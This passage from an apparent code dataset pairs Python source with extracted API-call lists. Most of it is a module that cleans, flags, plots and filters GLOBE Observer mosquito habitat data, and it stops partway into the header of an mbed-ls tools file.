"qua... | [((1554, 1576), 'gym.spaces.Discrete', 'gym.spaces.Discrete', (['(3)'], {}), '(3)\n', (1573, 1576), False, 'import gym\n'), ((1611, 1690), 'gym.spaces.Box', 'gym.spaces.Box', (['(0)', '(255)', '(3, args.frame_height, args.frame_width)'], {'dtype': '"""uint8"""'}), "(0, 255, (3, args.frame_height, args.frame_width), dtype='uint8')\n", (1625, 1690), False, 'import gym\n'), ((4531, 4585), 'quaternion.from_float_array', 'quaternion.from_float_array', (["episode['start_rotation']"], {}), "(episode['start_rotation'])\n", (4558, 4585), False, 'import quaternion\n'), ((5223, 5246), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (5233, 5246), False, 'from envs.utils.fmm_planner import FMMPlanner\n'), ((7404, 7455), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (["episode['sim_rot']"], {}), "(episode['sim_rot'])\n", (7435, 7455), False, 'import quaternion\n'), ((8090, 8113), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (8100, 8113), False, 'from envs.utils.fmm_planner import FMMPlanner\n'), ((12741, 12780), 'quaternion.as_rotation_vector', 'quaternion.as_rotation_vector', (['rotation'], {}), '(rotation)\n', (12770, 12780), False, 'import quaternion\n'), ((12842, 12879), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (['rvec'], {}), '(rvec)\n', (12873, 12879), False, 'import quaternion\n'), ((13400, 13430), 'quaternion.as_float_array', 'quaternion.as_float_array', (['rot'], {}), '(rot)\n', (13425, 13430), False, 'import quaternion\n'), ((14469, 14508), 'quaternion.as_rotation_vector', 'quaternion.as_rotation_vector', (['rotation'], {}), '(rotation)\n', (14498, 14508), False, 'import quaternion\n'), ((14654, 14691), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (['rvec'], {}), '(rvec)\n', (14685, 14691), False, 'import quaternion\n'), ((17587, 17619), 'envs.utils.pose.get_l2_distance', 'pu.get_l2_distance', (['(0)', 'dx', '(0)', 'dy'], {}), '(0, dx, 0, dy)\n', (17605, 17619), True, 'import envs.utils.pose as pu\n'), ((20971, 21032), 'envs.utils.pose.get_rel_pose_change', 'pu.get_rel_pose_change', (['curr_sim_pose', 'self.last_sim_location'], {}), '(curr_sim_pose, self.last_sim_location)\n', (20993, 21032), True, 'import envs.utils.pose as pu\n'), ((1384, 1420), 'bz2.BZ2File', 'bz2.BZ2File', (['dataset_info_file', '"""rb"""'], {}), "(dataset_info_file, 'rb')\n", (1395, 1420), False, 'import bz2\n'), ((1459, 1474), '_pickle.load', 'cPickle.load', (['f'], {}), '(f)\n', (1471, 1474), True, 'import _pickle as cPickle\n'), ((2440, 2473), 'numpy.arange', 'np.arange', (['args.num_eval_episodes'], {}), '(args.num_eval_episodes)\n', (2449, 2473), True, 'import numpy as np\n'), ((2486, 2526), 'numpy.random.shuffle', 'np.random.shuffle', (['self.shuffled_indices'], {}), '(self.shuffled_indices)\n', (2503, 2526), True, 'import numpy as np\n'), ((10252, 10264), 'numpy.arange', 'np.arange', (['(6)'], {}), '(6)\n', (10261, 10264), True, 'import numpy as np\n'), ((10663, 10694), 'numpy.random.choice', 'np.random.choice', (['possible_cats'], {}), '(possible_cats)\n', (10679, 10694), True, 'import numpy as np\n'), ((10726, 10749), 'constants.coco_categories.items', 'coco_categories.items', ([], {}), '()\n', (10747, 10749), False, 'from constants import coco_categories\n'), ((11043, 11066), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (11053, 11066), False, 'from envs.utils.fmm_planner import FMMPlanner\n'), ((11589, 11611), 'numpy.logical_and', 'np.logical_and', (['m1', 'm2'], {}), '(m1, m2)\n', (11603, 11611), True, 'import numpy as np\n'), ((15047, 15060), 'numpy.rad2deg', 'np.rad2deg', (['o'], {}), '(o)\n', (15057, 15060), True, 'import numpy as np\n'), ((20364, 20412), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20390, 20412), False, 'import quaternion\n'), ((960, 972), 'json.load', 'json.load', (['f'], {}), '(f)\n', (969, 972), False, 'import json\n'), ((11649, 11691), 'numpy.logical_and', 'np.logical_and', (['possible_starting_locs', 'm3'], {}), '(possible_starting_locs, m3)\n', (11663, 11691), True, 'import numpy as np\n'), ((12799, 12815), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12813, 12815), True, 'import numpy as np\n'), ((16280, 16316), 'numpy.concatenate', 'np.concatenate', (['(rgb, depth)'], {'axis': '(2)'}), '((rgb, depth), axis=2)\n', (16294, 16316), True, 'import numpy as np\n'), ((17945, 17981), 'numpy.concatenate', 'np.concatenate', (['(rgb, depth)'], {'axis': '(2)'}), '((rgb, depth), axis=2)\n', (17959, 17981), True, 'import numpy as np\n'), ((20555, 20603), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20581, 20603), False, 'import quaternion\n'), ((3579, 3608), 'gzip.open', 'gzip.open', (['episodes_file', '"""r"""'], {}), "(episodes_file, 'r')\n", (3588, 3608), False, 'import gzip\n'), ((4030, 4042), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4039, 4042), False, 'import json\n'), ((14611, 14627), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (14625, 14627), True, 'import numpy as np\n'), ((20649, 20697), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20675, 20697), False, 'import quaternion\n')] |
import math
import re
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from go_utils.cleanup import ( # isort: skip
rename_latlon_cols,
replace_column_prefix,
round_cols,
standardize_null_vals,
)
from go_utils.plot import ( # isort: skip
completeness_histogram,
plot_freq_bar,
plot_int_distribution,
)
__doc__ = r"""
## Mosquito Specific Cleanup Procedures
### Converting Larvae Data to Integers
Larvae Data is stored as a string in the raw GLOBE Observer dataset. To facillitate analysis, [this method](#larvae_to_num) converts this data to numerical data.
It needs to account for 4 types of data:
1. Regular Data: Converts it to a number
2. Extraneously large data ($\geq 100$ as its hard to count more than that amount accurately): To maintain the information from that entry, the `LarvaeCountMagnitude` flag is used to indicate the real value
3. Ranges (e.g. "25-50"): Chooses the lower bound and set the `LarvaeCountIsRangeFlag` to true.
4. Null Values: Sets null values to $-9999$
It generates the following flags:
- `LarvaeCountMagnitude`: The integer flag contains the order of magnitude (0-4) by which the larvae count exceeds the maximum Larvae Count of 100. This is calculated by $1 + \lfloor \log{\frac{num}{100}} \rfloor$. As a result:
- `0`: Corresponds to a Larvae Count $\leq 100$
- `1`: Corresponds to a Larvae Count between $100$ and $999$
- `2`: Corresponds to a Larvae Count between $1000$ and $9999$
- `3`: Corresponds to a Larvae Count between $10,000$ and $99,999$
- `4`: Corresponds to a Larvae Count $\geq 100,000$
- `LarvaeCountIsRange`: Either a $1$ which indicates the entry was a range (e.g. 25-50) or $0$ which indicates the entry wasn't a range.
Additionally, there were extremely large values that Python was unable to process (`1e+27`) and so there was an initial preprocessing step to set those numbers to 100000 (which corresponds to the maximum magnitude flag).
"""
def cleanup_column_prefix(df, inplace=False):
"""Method for shortening raw mosquito habitat mapper column names.
Parameters
----------
df : pd.DataFrame
The DataFrame containing raw mosquito habitat mapper data.
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame or None
A DataFrame with the cleaned up column prefixes. If `inplace=True` it returns None.
"""
return replace_column_prefix(df, "mosquitohabitatmapper", "mhm", inplace=inplace)
def _entry_to_num(entry):
try:
if entry == "more than 100":
return 101, 1, 1
if pd.isna(entry):
return -9999, 0, 0
elif float(entry) > 100:
return 101, min(math.floor(math.log10(float(entry) / 100)) + 1, 4), 0
return float(entry), 0, 0
except ValueError:
return float(re.sub(r"-.*", "", entry)), 0, 1
def larvae_to_num(
mhm_df,
larvae_count_col="mhm_LarvaeCount",
magnitude="mhm_LarvaeCountMagnitude",
range_flag="mhm_LarvaeCountIsRangeFlag",
inplace=False,
):
"""Converts the Larvae Count of the Mosquito Habitat Mapper Dataset from being stored as a string to integers.
See [here](#converting-larvae-data-to-integers) for more information.
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame of Mosquito Habitat Mapper data that needs the larvae counts to be set to numbers
larvae_count_col : str, default="mhm_LarvaeCount"
The name of the column storing the larvae count. **Note**: The columns will be output in the format: `prefix_ColumnName` where `prefix` is all the characters that preceed the words `LarvaeCount` in the specified name.
magnitude: str, default="mhm_LarvaeCountMagnitude"
The name of the column which will store the generated LarvaeCountMagnitude output
range_flag : str, default="mhm_LarvaeCountIsRangeFlag"
The name of the column which will store the generated LarvaeCountIsRange flag
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the larvae count as integers. If `inplace=True` it returns None.
"""
if not inplace:
mhm_df = mhm_df.copy()
# Preprocessing step to remove extremely erroneous values
for i in mhm_df.index:
count = mhm_df[larvae_count_col][i]
if not pd.isna(count) and type(count) is str and "e+" in count:
mhm_df.at[i, larvae_count_col] = "100000"
larvae_conversion = np.vectorize(_entry_to_num)
(
mhm_df[larvae_count_col],
mhm_df[magnitude],
mhm_df[range_flag],
) = larvae_conversion(mhm_df[larvae_count_col].to_numpy())
if not inplace:
return mhm_df
def has_genus_flag(df, genus_col="mhm_Genus", bit_col="mhm_HasGenus", inplace=False):
"""
Creates a bit flag: `mhm_HasGenus` where 1 denotes a recorded Genus and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
genus_col : str, default="mhm_Genus"
The name of the column in the mosquito habitat mapper DataFrame that contains the genus records.
bit_col : str, default="mhm_HasGenus"
The name of the column which will store the generated HasGenus flag
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the HasGenus flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
df[bit_col] = (~pd.isna(df[genus_col].to_numpy())).astype(int)
if not inplace:
return df
def infectious_genus_flag(
df, genus_col="mhm_Genus", bit_col="mhm_IsGenusOfInterest", inplace=False
):
"""
Creates a bit flag: `mhm_IsGenusOfInterest` where 1 denotes a Genus of a infectious mosquito and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
genus_col : str, default="mhm_Genus"
The name of the column in the mosquito habitat mapper DataFrame that contains the genus records.
bit_col : str, default="mhm_HasGenus"
The name of the column which will store the generated IsGenusOfInterest flag
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the IsGenusOfInterest flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
infectious_genus_flag = np.vectorize(
lambda genus: genus in ["Aedes", "Anopheles", "Culex"]
)
df[bit_col] = infectious_genus_flag(df[genus_col].to_numpy()).astype(int)
if not inplace:
return df
def is_container_flag(
df,
watersource_col="mhm_WaterSourceType",
bit_col="mhm_IsWaterSourceContainer",
inplace=False,
):
"""
Creates a bit flag: `mhm_IsWaterSourceContainer` where 1 denotes if a watersource is a container (e.g. ovitrap, pots, tires, etc.) and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_col : str, default="mhm_WaterSourceType"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource type records.
bit_col : str, default="mhm_IsWaterSourceContainer"
The name of the column which will store the generated IsWaterSourceContainer flag
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the IsContainer flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
mark_containers = np.vectorize(lambda container: "container" in container)
df[bit_col] = mark_containers(df[watersource_col].to_numpy()).astype(int)
if not inplace:
return df
def has_watersource_flag(
df, watersource_col="mhm_WaterSource", bit_col="mhm_HasWaterSource", inplace=False
):
"""
Creates a bit flag: `mhm_HasWaterSource` where 1 denotes if there is a watersource and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_col : str, default="mhm_WaterSource"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource records.
bit_col : str, default="mhm_IsWaterSourceContainer"
The name of the column which will store the generated HasWaterSource flag
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the HasWaterSource flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
has_watersource = np.vectorize(lambda watersource: int(not pd.isna(watersource)))
df[bit_col] = has_watersource(df[watersource_col].to_numpy())
if not inplace:
return df
def photo_bit_flags(
df,
watersource_photos="mhm_WaterSourcePhotoUrls",
larvae_photos="mhm_LarvaFullBodyPhotoUrls",
abdomen_photos="mhm_AbdomenCloseupPhotoUrls",
photo_count="mhm_PhotoCount",
rejected_count="mhm_RejectedCount",
pending_count="mhm_PendingCount",
photo_bit_binary="mhm_PhotoBitBinary",
photo_bit_decimal="mhm_PhotoBitDecimal",
inplace=False,
):
"""
Creates the following flags:
- `PhotoCount`: The number of valid photos per record.
- `RejectedCount`: The number of photos that were rejected per record.
- `PendingCount`: The number of photos that are pending approval per record.
- `PhotoBitBinary`: A string that represents the presence of a photo in the order of watersource, larvae, and abdomen. For example, if the entry is `110`, that indicates that there is a water source photo and a larvae photo, but no abdomen photo.
- `PhotoBitDecimal`: The numerical representation of the mhm_PhotoBitBinary string.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_photos : str, default="mhm_WaterSourcePhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource photo url records.
larvae_photos : str, default="mhm_LarvaFullBodyPhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the larvae photo url records.
abdomen_photos : str, default="mhm_AbdomenCloseupPhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the abdomen photo url records.
photo_count : str, default="mhm_PhotoCount"
The name of the column that will store the PhotoCount flag.
rejected_count : str, default="mhm_RejectedCount"
The name of the column that will store the RejectedCount flag.
pending_count : str, default="mhm_PendingCount"
The name of the column that will store the PendingCount flag.
photo_bit_binary : str, default="mhm_PhotoBitBinary"
The name of the column that will store the PhotoBitBinary flag.
photo_bit_decimal : str, default="mhm_PhotoBitDecimal"
The name of the column that will store the PhotoBitDecimal flag.
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the photo flags. If `inplace=True` it returns None.
"""
def pic_data(*args):
pic_count = 0
rejected_count = 0
pending_count = 0
valid_photo_bit_mask = ""
# bit_power = len(args) - 1
# For url string -- if we see ANY http, add 1
# also count all valid photos, rejected photos,
# If there are NO http then add 0, to empty photo field
for url_string in args:
if not pd.isna(url_string):
if "http" not in url_string:
valid_photo_bit_mask += "0"
else:
valid_photo_bit_mask += "1"
pic_count += url_string.count("http")
pending_count += url_string.count("pending")
rejected_count += url_string.count("rejected")
else:
valid_photo_bit_mask += "0"
return (
pic_count,
rejected_count,
pending_count,
valid_photo_bit_mask,
int(valid_photo_bit_mask, 2),
)
if not inplace:
df = df.copy()
get_photo_data = np.vectorize(pic_data)
(
df[photo_count],
df[rejected_count],
df[pending_count],
df[photo_bit_binary],
df[photo_bit_decimal],
) = get_photo_data(
df[watersource_photos].to_numpy(),
df[larvae_photos].to_numpy(),
df[abdomen_photos].to_numpy(),
)
if not inplace:
return df
def completion_score_flag(
df,
photo_bit_binary="mhm_PhotoBitBinary",
has_genus="mhm_HasGenus",
sub_completeness="mhm_SubCompletenessScore",
completeness="mhm_CumulativeCompletenessScore",
inplace=False,
):
"""
Adds the following completness score flags:
- `SubCompletenessScore`: The percentage of the watersource photos, larvae photos, abdomen photos, and genus columns that are filled out.
- `CumulativeCompletenessScore`: The percentage of non null values out of all the columns.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame with the [`PhotoBitDecimal`](#photo_bit_flags) and [`HasGenus`](#has_genus_flags) flags.
photo_bit_binary: str, default="mhm_PhotoBitBinary"
The name of the column in the mosquito habitat mapper DataFrame that contains the PhotoBitBinary flag.
sub_completeness : str, default="mhm_HasGenus"
The name of the column in the mosquito habitat mapper DataFrame that will contain the generated SubCompletenessScore flag.
completeness : str, default="mhm_SubCompletenessScore"
The name of the column in the mosquito habitat mapper DataFrame that will contain the generated CumulativeCompletenessScore flag.
inplace : bool, default=False
Whether to return a new DataFrame. If True then no DataFrame copy is not returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with completion score flags. If `inplace=True` it returns None.
"""
def sum_bit_mask(bit_mask="0"):
total = 0.0
for char in bit_mask:
total += int(char)
return total
if not inplace:
df = df.copy()
scores = {}
scores["sub_score"] = []
# Cummulative Completion Score
scores["cumulative_score"] = round(df.count(axis=1) / len(df.columns), 2)
# Sub-Score
for index in df.index:
bit_mask = df[photo_bit_binary][index]
sub_score = df[has_genus][index] + sum_bit_mask(bit_mask=bit_mask)
sub_score /= 4.0
scores["sub_score"].append(sub_score)
df[sub_completeness], df[completeness] = (
scores["sub_score"],
scores["cumulative_score"],
)
if not inplace:
return df
def apply_cleanup(mhm_df):
"""Applies a full cleanup procedure to the mosquito habitat mapper data. Only returns a copy.
It follows the following steps:
- Removes Homogenous Columns
- Renames Latitude and Longitudes
- Cleans the Column Naming
- Converts Larvae Count to Numbers
- Rounds Columns
- Standardizes Null Values
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame containing **raw** Mosquito Habitat Mapper Data from the API.
Returns
-------
pd.DataFrame
A DataFrame containing the cleaned up Mosquito Habitat Mapper Data
"""
mhm_df = mhm_df.copy()
rename_latlon_cols(mhm_df, inplace=True)
cleanup_column_prefix(mhm_df, inplace=True)
larvae_to_num(mhm_df, inplace=True)
round_cols(mhm_df, inplace=True)
standardize_null_vals(mhm_df, inplace=True)
return mhm_df
def add_flags(mhm_df):
"""Adds the following flags to the Mosquito Habitat Mapper Data:
- Has Genus
- Is Infectious Genus/Genus of Interest
- Is Container
- Has WaterSource
- Photo Bit Flags
- Completion Score Flag
This returns a copy of the original DataFrame with the flags added onto it.
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame containing cleaned up Mosquito Habitat Mapper Data ideally from the method.
Returns
-------
pd.DataFrame
A DataFrame containing the flagged Mosquito Habitat Mapper Data
"""
mhm_df = mhm_df.copy()
has_genus_flag(mhm_df, inplace=True)
infectious_genus_flag(mhm_df, inplace=True)
is_container_flag(mhm_df, inplace=True)
has_watersource_flag(mhm_df, inplace=True)
photo_bit_flags(mhm_df, inplace=True)
completion_score_flag(mhm_df, inplace=True)
return mhm_df
def plot_valid_entries(df, bit_col, entry_type):
"""
Plots the number of entries with photos and the number of entries without photos
Parameters
----------
df : pd.DataFrame
The DataFrame containing Mosquito Habitat Mapper Data with the PhotoBitDecimal Flag.
"""
plt.figure()
num_valid = len(df[df[bit_col] > 0])
plt.title(f"Entries with {entry_type} vs No {entry_type}")
plt.ylabel("Number of Entries")
plt.bar(entry_type, num_valid, color="#e34a33")
plt.bar(f"No {entry_type}", len(df) - num_valid, color="#fdcc8a")
def photo_subjects(mhm_df):
"""
Plots the amount of photos for each photo area (Larvae, Abdomen, Watersource)
Parameters
----------
mhm_df : pd.DataFrame
The DataFrame containing Mosquito Habitat Mapper Data with the PhotoBitDecimal Flag.
"""
total_dict = {"Larvae Photos": 0, "Abdomen Photos": 0, "Watersource Photos": 0}
for number in mhm_df["mhm_PhotoBitDecimal"]:
total_dict["Watersource Photos"] += number & 4
total_dict["Larvae Photos"] += number & 2
total_dict["Abdomen Photos"] += number & 1
for key in total_dict.keys():
if total_dict[key] != 0:
total_dict[key] = math.log10(total_dict[key])
else:
total_dict[key] = 0
plt.figure(figsize=(10, 5))
plt.title("Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)")
plt.xlabel("Photo Type")
plt.ylabel("Frequency (Log Scale)")
plt.bar(total_dict.keys(), total_dict.values(), color="lightblue")
def diagnostic_plots(mhm_df):
"""
Generates (but doesn't display) diagnostic plots to gain insight into the current data.
Plots:
- Larvae Count Distribution (where a negative entry denotes null data)
- Photo Subject Distribution
- Number of valid photos vs no photos
- Completeness Score Distribution
- Subcompleteness Score Distribution
Parameters
----------
mhm_df : pd.DataFrame
The DataFrame containing Flagged and Cleaned Mosquito Habitat Mapper Data.
"""
plot_int_distribution(mhm_df, "mhm_LarvaeCount", "Larvae Count")
photo_subjects(mhm_df)
plot_freq_bar(mhm_df, "Mosquito Habitat Mapper", "mhm_Genus", "Genus Types")
plot_valid_entries(mhm_df, "mhm_HasGenus", "Genus Classifications")
plot_valid_entries(mhm_df, "mhm_PhotoBitDecimal", "Valid Photos")
completeness_histogram(
mhm_df,
"Mosquito Habitat Mapper",
"mhm_CumulativeCompletenessScore",
"Cumulative Completeness",
)
completeness_histogram(
mhm_df,
"Mosquito Habitat Mapper",
"mhm_SubCompletenessScore",
"Sub Completeness",
)
def qa_filter(
mhm_df,
has_genus=False,
min_larvae_count=-9999,
has_photos=False,
is_container=False,
):
"""
Can filter a cleaned and flagged mosquito habitat mapper DataFrame based on the following criteria:
- `Has Genus`: If the entry has an identified genus
- `Min Larvae Count` : Minimum larvae count needed for an entry
- `Has Photos` : If the entry contains valid photo entries
- `Is Container` : If the entry's watersource was a container
Returns a copy of the DataFrame
Parameters
----------
has_genus : bool, default=False
If True, only entries with an identified genus will be returned.
min_larvae_count : int, default=-9999
Only entries with a larvae count greater than or equal to this parameter will be included.
has_photos : bool, default=False
If True, only entries with recorded photos will be returned
is_container : bool, default=False
If True, only entries with containers will be returned
Returns
-------
pd.DataFrame
A DataFrame of the applied filters.
"""
mhm_df = mhm_df[mhm_df["mhm_LarvaeCount"] >= min_larvae_count]
if has_genus:
mhm_df = mhm_df[mhm_df["mhm_HasGenus"] == 1]
if has_photos:
mhm_df = mhm_df[mhm_df["mhm_PhotoBitDecimal"] > 0]
if is_container:
mhm_df = mhm_df[mhm_df["mhm_IsWaterSourceContainer"] == 1]
return mhm_df
| [
"go_utils.plot.completeness_histogram",
"go_utils.plot.plot_int_distribution",
"matplotlib.pyplot.ylabel",
"go_utils.cleanup.round_cols",
"matplotlib.pyplot.xlabel",
"go_utils.cleanup.rename_latlon_cols",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.bar",
"re.sub",
"go_utils.cleanup.standardize_... | [((2550, 2624), 'go_utils.cleanup.replace_column_prefix', 'replace_column_prefix', (['df', '"""mosquitohabitatmapper"""', '"""mhm"""'], {'inplace': 'inplace'}), "(df, 'mosquitohabitatmapper', 'mhm', inplace=inplace)\n", (2571, 2624), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((4754, 4781), 'numpy.vectorize', 'np.vectorize', (['_entry_to_num'], {}), '(_entry_to_num)\n', (4766, 4781), True, 'import numpy as np\n'), ((6970, 7038), 'numpy.vectorize', 'np.vectorize', (["(lambda genus: genus in ['Aedes', 'Anopheles', 'Culex'])"], {}), "(lambda genus: genus in ['Aedes', 'Anopheles', 'Culex'])\n", (6982, 7038), True, 'import numpy as np\n'), ((8261, 8317), 'numpy.vectorize', 'np.vectorize', (["(lambda container: 'container' in container)"], {}), "(lambda container: 'container' in container)\n", (8273, 8317), True, 'import numpy as np\n'), ((13235, 13257), 'numpy.vectorize', 'np.vectorize', (['pic_data'], {}), '(pic_data)\n', (13247, 13257), True, 'import numpy as np\n'), ((16539, 16579), 'go_utils.cleanup.rename_latlon_cols', 'rename_latlon_cols', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16557, 16579), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((16672, 16704), 'go_utils.cleanup.round_cols', 'round_cols', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16682, 16704), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((16709, 16752), 'go_utils.cleanup.standardize_null_vals', 'standardize_null_vals', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16730, 16752), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((17989, 18001), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (17999, 18001), True, 'import matplotlib.pyplot as plt\n'), ((18047, 18105), 'matplotlib.pyplot.title', 'plt.title', (['f"""Entries with {entry_type} vs No {entry_type}"""'], {}), "(f'Entries with {entry_type} vs No {entry_type}')\n", (18056, 18105), True, 'import matplotlib.pyplot as plt\n'), ((18110, 18141), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of Entries"""'], {}), "('Number of Entries')\n", (18120, 18141), True, 'import matplotlib.pyplot as plt\n'), ((18146, 18193), 'matplotlib.pyplot.bar', 'plt.bar', (['entry_type', 'num_valid'], {'color': '"""#e34a33"""'}), "(entry_type, num_valid, color='#e34a33')\n", (18153, 18193), True, 'import matplotlib.pyplot as plt\n'), ((19009, 19036), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (19019, 19036), True, 'import matplotlib.pyplot as plt\n'), ((19041, 19117), 'matplotlib.pyplot.title', 'plt.title', (['"""Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)"""'], {}), "('Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)')\n", (19050, 19117), True, 'import matplotlib.pyplot as plt\n'), ((19122, 19146), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Photo Type"""'], {}), "('Photo Type')\n", (19132, 19146), True, 'import matplotlib.pyplot as plt\n'), ((19151, 19186), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Frequency (Log Scale)"""'], {}), "('Frequency (Log Scale)')\n", (19161, 19186), True, 'import matplotlib.pyplot as plt\n'), ((19783, 19847), 'go_utils.plot.plot_int_distribution', 'plot_int_distribution', (['mhm_df', '"""mhm_LarvaeCount"""', '"""Larvae Count"""'], {}), "(mhm_df, 'mhm_LarvaeCount', 'Larvae Count')\n", (19804, 19847), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((19879, 19955), 'go_utils.plot.plot_freq_bar', 'plot_freq_bar', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_Genus"""', '"""Genus Types"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper', 'mhm_Genus', 'Genus Types')\n", (19892, 19955), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((20102, 20225), 'go_utils.plot.completeness_histogram', 'completeness_histogram', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_CumulativeCompletenessScore"""', '"""Cumulative Completeness"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper',\n 'mhm_CumulativeCompletenessScore', 'Cumulative Completeness')\n", (20124, 20225), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((20265, 20374), 'go_utils.plot.completeness_histogram', 'completeness_histogram', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_SubCompletenessScore"""', '"""Sub Completeness"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper',\n 'mhm_SubCompletenessScore', 'Sub Completeness')\n", (20287, 20374), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((2739, 2753), 'pandas.isna', 'pd.isna', (['entry'], {}), '(entry)\n', (2746, 2753), True, 'import pandas as pd\n'), ((18931, 18958), 'math.log10', 'math.log10', (['total_dict[key]'], {}), '(total_dict[key])\n', (18941, 18958), False, 'import math\n'), ((4618, 4632), 'pandas.isna', 'pd.isna', (['count'], {}), '(count)\n', (4625, 4632), True, 'import pandas as pd\n'), ((12562, 12581), 'pandas.isna', 'pd.isna', (['url_string'], {}), '(url_string)\n', (12569, 12581), True, 'import pandas as pd\n'), ((2979, 3003), 're.sub', 're.sub', (['"""-.*"""', '""""""', 'entry'], {}), "('-.*', '', entry)\n", (2985, 3003), False, 'import re\n'), ((9482, 9502), 'pandas.isna', 'pd.isna', (['watersource'], {}), '(watersource)\n', (9489, 9502), True, 'import pandas as pd\n')] |
"""
mbed SDK
Copyright (c) 2011-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import os
import sys
import functools
from os.path import expanduser
from io import open
import json
from os import listdir
from os.path import isfile, join, exists, isdir
import logging
from abc import ABCMeta, abstractmethod
from .platform_database import PlatformDatabase, LOCAL_PLATFORM_DATABASE, \
LOCAL_MOCKS_DATABASE
mbedls_root_logger = logging.getLogger("mbedls")
mbedls_root_logger.setLevel(logging.WARNING)
logger = logging.getLogger("mbedls.lstools_base")
logger.addHandler(logging.NullHandler())
def deprecated(reason):
"""Deprecate a function/method with a decorator"""
def actual_decorator(func):
@functools.wraps(func)
def new_func(*args, **kwargs):
logger.warning("Call to deprecated function %s. %s",
func.__name__, reason)
